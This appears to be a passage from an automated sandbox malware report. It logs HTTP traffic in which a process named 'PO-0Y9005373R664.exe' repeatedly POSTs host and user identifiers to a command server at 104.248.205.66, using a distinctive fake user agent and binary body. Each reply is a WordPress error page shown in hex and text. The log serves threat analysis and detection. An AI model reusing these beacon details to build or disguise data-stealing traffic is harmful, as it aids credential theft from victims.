                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:59.722048998 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:59.722059011 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        27192.168.2.849748104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:59.874196053 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:59.879049063 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:02.225591898 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:00 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:02.225614071 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:04:02.225626945 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        28192.168.2.849749104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:02.372833014 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:02.379636049 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:04.631860018 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:02 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:04.631895065 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:04:04.631906033 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:04:04.631911993 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        29192.168.2.849750104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:04.778196096 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:04.783248901 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:07.063370943 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:05 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:07.063405991 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:04:07.063419104 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        30192.168.2.849751104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:07.245456934 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:07.250483036 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:09.482350111 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:07 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:09.482382059 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:04:09.482393980 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:04:09.482405901 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        31192.168.2.849752104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:09.888953924 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:09.894994974 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:12.157613993 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:10 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
